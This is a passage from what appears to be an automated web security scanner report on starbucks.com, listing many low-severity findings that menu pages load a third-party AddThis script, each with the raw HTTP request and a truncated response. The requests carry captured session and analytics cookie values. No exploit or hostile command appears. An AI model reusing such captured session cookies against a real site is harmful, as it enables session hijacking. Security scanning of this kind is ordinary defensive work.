<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.90. http://www.starbucks.com/menu/drinks/espresso/caffe-mocha

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/caffe-mocha

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/caffe-mocha HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:43 GMT
Connection: close
Content-Length: 42920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.91. http://www.starbucks.com/menu/drinks/espresso/cappuccino

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/cappuccino

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/cappuccino HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:51 GMT
Connection: close
Content-Length: 42663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.92. http://www.starbucks.com/menu/drinks/espresso/caramel-brulee-latte

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/caramel-brulee-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/caramel-brulee-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:22:03 GMT
Connection: close
Content-Length: 43212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.93. http://www.starbucks.com/menu/drinks/espresso/caramel-macchiato

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/caramel-macchiato

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/caramel-macchiato HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:22:38 GMT
Connection: close
Content-Length: 42997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.94. http://www.starbucks.com/menu/drinks/espresso/cinnamon-dolce-latte

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/cinnamon-dolce-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/cinnamon-dolce-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:22:53 GMT
Connection: close
Content-Length: 42893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.95. http://www.starbucks.com/menu/drinks/espresso/eggnog-latte

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/eggnog-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/eggnog-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:22:56 GMT
Connection: close
Content-Length: 42950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.96. http://www.starbucks.com/menu/drinks/espresso/espresso-con-panna

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/espresso-con-panna

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/espresso-con-panna HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:23:07 GMT
Connection: close
Content-Length: 42186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.97. http://www.starbucks.com/menu/drinks/espresso/espresso-macchiato

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/espresso-macchiato

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/espresso-macchiato HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:23:12 GMT
Connection: close
Content-Length: 42725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.98. http://www.starbucks.com/menu/drinks/espresso/espresso-shot

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/espresso-shot

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/espresso-shot HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:22:57 GMT
Connection: close
Content-Length: 42066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.99. http://www.starbucks.com/menu/drinks/espresso/flavored-latte

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/flavored-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/flavored-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:23:21 GMT
Connection: close
Content-Length: 42425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.100. http://www.starbucks.com/menu/drinks/espresso/gingerbread-latte

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/gingerbread-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/gingerbread-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:23:48 GMT
Connection: close
Content-Length: 43229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.101. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-americano

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-caffe-americano

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/iced-caffe-americano HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:23:58 GMT
Connection: close
Content-Length: 42372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.102. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-latte

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-caffe-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/iced-caffe-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:24:03 GMT
Connection: close
Content-Length: 42552

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.103. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-mocha

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-caffe-mocha

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/iced-caffe-mocha HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:24:27 GMT
Connection: close
Content-Length: 42794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.104. http://www.starbucks.com/menu/drinks/espresso/iced-caramel-macchiato

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-caramel-macchiato

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/iced-caramel-macchiato HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:24:39 GMT
Connection: close
Content-Length: 42709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.105. http://www.starbucks.com/menu/drinks/espresso/iced-cinnamon-dolce-latte

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-cinnamon-dolce-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/iced-cinnamon-dolce-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:24:57 GMT
Connection: close
Content-Length: 42846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.106. http://www.starbucks.com/menu/drinks/espresso/iced-flavored-latte

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-flavored-latte

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/espresso/iced-flavored-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:03 GMT
Connection: close
Content-Length: 42787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.107. http://www.starbucks.com/menu/drinks/espresso/iced-gingerbread-latte

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-gingerbread-latte

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/espresso/iced-gingerbread-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:07 GMT
Connection: close
Content-Length: 43223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.108. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-mocha

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-peppermint-mocha

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/espresso/iced-peppermint-mocha HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:04 GMT
Connection: close
Content-Length: 42862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.109. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-white-chocolate-mocha

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/iced-peppermint-white-chocolate-mocha

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/espresso/iced-peppermint-white-chocolate-mocha HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:17 GMT
Connection: close
Content-Length: 43181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
